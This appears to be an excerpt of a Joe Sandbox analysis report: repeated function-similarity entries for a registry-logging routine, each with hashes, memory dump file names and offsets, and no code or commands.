                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 5cff05381c3f7f1274eebad37c756cae9790040e27bf0f6e9d7a1543ffd313dc
                                                                                                                  • Instruction ID: 6324edb7e2bc6f9443e99f1f48a1bfb3efd65f1eb5ea74148476ea89f8ac7623
                                                                                                                  • Opcode Fuzzy Hash: 5cff05381c3f7f1274eebad37c756cae9790040e27bf0f6e9d7a1543ffd313dc
                                                                                                                  • Instruction Fuzzy Hash: DAF0F622609A0642EA52DF02BC403F92254EF447B4F080276ED1D466F0EFADEA498300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: a99d3e96cd9d8798622bd175c7a81bf87decf0b9520b466e5d09dfbd9c86fb8f
                                                                                                                  • Instruction ID: b15f9d459cd66eff272362169195e948a566319ebfb0c6c41aad186d2db00ee6
                                                                                                                  • Opcode Fuzzy Hash: a99d3e96cd9d8798622bd175c7a81bf87decf0b9520b466e5d09dfbd9c86fb8f
                                                                                                                  • Instruction Fuzzy Hash: A8F0F622609B0642EA52DF02BC403F92154FF447B4F080275ED5D466F0EFADE9898300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: c429d72c34a97fbf486d0a496476be34e1da0afc766eba340cf7d1912e4eb84c
                                                                                                                  • Instruction ID: 6fa8494773e51bc4c8d41d548a5a58188399982c4e767b50b2ee7adb36629b9b
                                                                                                                  • Opcode Fuzzy Hash: c429d72c34a97fbf486d0a496476be34e1da0afc766eba340cf7d1912e4eb84c
                                                                                                                  • Instruction Fuzzy Hash: 59F0F663B0CE46C6E5529F42B8403BA2255EF82BB4F4801F7ED4D466B0DF2DD9898300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: df2f9d6ef0c891b281276911fe4f1952ca46b6bb0ac4f645e01c49f1e640ec4f
                                                                                                                  • Instruction ID: 883c1ed6f925ca25575804ce74e12fa7dd3d6ffe24d2cc572035f74f4338b659
                                                                                                                  • Opcode Fuzzy Hash: df2f9d6ef0c891b281276911fe4f1952ca46b6bb0ac4f645e01c49f1e640ec4f
                                                                                                                  • Instruction Fuzzy Hash: 32F0F663B0CE46C6E5529F42B8403BA6255EF82BB4F4801F7ED4D866B0DF2DD9898300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 957c23676379ab83da7d228dc67bb8f830d43e6c61dd12aba3f6dd6ab3220d3c
                                                                                                                  • Instruction ID: 63eb4417c3bbab43f1d97d23cef92dae48b84e81e7306c84eb7c6a82dcc3eec9
                                                                                                                  • Opcode Fuzzy Hash: 957c23676379ab83da7d228dc67bb8f830d43e6c61dd12aba3f6dd6ab3220d3c
                                                                                                                  • Instruction Fuzzy Hash: 18F0C263B0CA4682E6528B42B8403BA2255AF82BB4F0802F7ED4D466A0DF2DD9899300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 5eb64188fb564de82c88d2f083ff461c1ce3bdb0de117112952c86aac17cdd41
                                                                                                                  • Instruction ID: 20e6f1e37d10f19f3f34bb060ba4c02725da4f944417990e4cf6d41cbf6c9c39
                                                                                                                  • Opcode Fuzzy Hash: 5eb64188fb564de82c88d2f083ff461c1ce3bdb0de117112952c86aac17cdd41
                                                                                                                  • Instruction Fuzzy Hash: DCF0F663B0CF46C6E5529F42B8403BA2255EF82BB4F4802F7ED4D466B0EF2DD9898300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 5ebb3171ee6302a649f837a2fda9caeed4ecd5e739653774abbafd5783d5ca14
                                                                                                                  • Instruction ID: 54d968a3d4f8242997cbe488c4ba63e431d8d26fe4faee8ece0ffdfe26373b37
                                                                                                                  • Opcode Fuzzy Hash: 5ebb3171ee6302a649f837a2fda9caeed4ecd5e739653774abbafd5783d5ca14
                                                                                                                  • Instruction Fuzzy Hash: 0AF0C263B0CA4686E5529B42B8403BA2255AF82BB4F4801F7ED4C466A0DF2DD9898300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 413746e8027013c1450730f39d7e9be24e345dca81f69a7540d0a3d601879d43
                                                                                                                  • Instruction ID: bd04ac6ad774527fd5615eeea48a5980e77ab75ce038933ea664126c7b5494f8
                                                                                                                  • Opcode Fuzzy Hash: 413746e8027013c1450730f39d7e9be24e345dca81f69a7540d0a3d601879d43
                                                                                                                  • Instruction Fuzzy Hash: E8F0C222A0DA0A45E7928F41B84037A625DBF407B8F4802B9DD0D4B2B1EF3CDA4A8300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 6ca835e196098e12a374f1654ece0a39f264962d4e65761b7f250adc6ffd05d5
                                                                                                                  • Instruction ID: 740830b82ec4e036a39f6256621885a1e8d0f4798a362d82c7041ed0488a2a02
                                                                                                                  • Opcode Fuzzy Hash: 6ca835e196098e12a374f1654ece0a39f264962d4e65761b7f250adc6ffd05d5
                                                                                                                  • Instruction Fuzzy Hash: D8F0C222A0DA0A45E7928F41B84037A625DBF407B4F4801B9DD0C4B2B1EF3CDA4A8300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 3e990f831b1a7271ae6404353364ba871073f3c36765afa4535ce2bc8a34e3de
                                                                                                                  • Instruction ID: 3986153a2b54f5293a1322fa42773888274616556fab4afd6192084d7b6df300
                                                                                                                  • Opcode Fuzzy Hash: 3e990f831b1a7271ae6404353364ba871073f3c36765afa4535ce2bc8a34e3de
                                                                                                                  • Instruction Fuzzy Hash: 6EF0FC12A0DE0645E7528F41B84037E615DBF407B4F4801B9DD0D476B1DF3CD9498300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: af9ae2ecaaf6f118344d3800ee307e97f55ccdff598e542353bd9f7bfe661342
                                                                                                                  • Instruction ID: 56708ff43dbfb5680ccd917bc35623098c6bcea09e653ae6de4f07c6fb3842d3
                                                                                                                  • Opcode Fuzzy Hash: af9ae2ecaaf6f118344d3800ee307e97f55ccdff598e542353bd9f7bfe661342
                                                                                                                  • Instruction Fuzzy Hash: 41F0C222A0DA0A45E7928F41B84037A625DBF407B8F4801BADD0D4B2B1EF3CDA4A8300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: c6950ea80fd3833b33375c734f29831daf092845128eca107685d6ee46c9cab3
                                                                                                                  • Instruction ID: d2d2ac15bf10a6663f952151cf2194f2f84c9c15f42b890fb1b302571dac5e4c
                                                                                                                  • Opcode Fuzzy Hash: c6950ea80fd3833b33375c734f29831daf092845128eca107685d6ee46c9cab3
                                                                                                                  • Instruction Fuzzy Hash: 73F0C222A0DA0A45E7928F51B84037A629DBF407B8F4802B9DD4D476B1EF3CDA8A9300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: dfc3d5452ae4924382ea6fe93a0fbf9d4bc3aad60b172f611cf4cb8f220826fa
                                                                                                                  • Instruction ID: 865976c47217a6dc972fc020065fe6f52cc4c7c658cfc36007e6b4143e060c49
                                                                                                                  • Opcode Fuzzy Hash: dfc3d5452ae4924382ea6fe93a0fbf9d4bc3aad60b172f611cf4cb8f220826fa
                                                                                                                  • Instruction Fuzzy Hash: 49F09C13A0CA4641E752DF91BC403B7625CAF407B4F840175DD5D467E0DF2DFA459700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: b4c4cdc361995d3af475825b5b9592a90d7172a47e3cb3fd7d6a7c25dfe11def
                                                                                                                  • Instruction ID: 7648a2f62bd943bcb222eb3cf26851344e859881db3804f4df7d160461e922a0
                                                                                                                  • Opcode Fuzzy Hash: b4c4cdc361995d3af475825b5b9592a90d7172a47e3cb3fd7d6a7c25dfe11def
                                                                                                                  • Instruction Fuzzy Hash: FEF06223A08A4641EB52DF91BC403BB625CAF407B4F880176DD5D466E0EF2DFA8A9300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 167771c8c1c4554efda54008c580c9ff860e930fcaca6236bde73388e3653b50
                                                                                                                  • Instruction ID: bf70345671271f3e6e3ebcbe30e483ba29fe51fc68d351a34719ec48912e5856
                                                                                                                  • Opcode Fuzzy Hash: 167771c8c1c4554efda54008c580c9ff860e930fcaca6236bde73388e3653b50
                                                                                                                  • Instruction Fuzzy Hash: BAF09623A0CA4641EB52DF91BC403BB625CBF407B4F880175DD5D466E0EF2DFA8A9300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: b65c7fc0dbd9a7b0299e0c2b8e0232ef07709154f27581d121896d02f68235f8
                                                                                                                  • Instruction ID: 4919d6799bf9276306e7dff8f4bad38bdcd5d0c632e67abf5f15bd6ce57f4830
                                                                                                                  • Opcode Fuzzy Hash: b65c7fc0dbd9a7b0299e0c2b8e0232ef07709154f27581d121896d02f68235f8
                                                                                                                  • Instruction Fuzzy Hash: E1F06223A08A4641EB52DF91BC403BB625CAF407B5F880275DD5D466E0EF2DFA8A9300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 3cc0958dc823a3f95ba49ee48407de72d55fdcc69baeec2a75528ed6b1a49501
                                                                                                                  • Instruction ID: 6fe03270a9d6831e09ee4b2c12cf2ee0ca3beed67f7bb5634ac7178aecf75b00
                                                                                                                  • Opcode Fuzzy Hash: 3cc0958dc823a3f95ba49ee48407de72d55fdcc69baeec2a75528ed6b1a49501
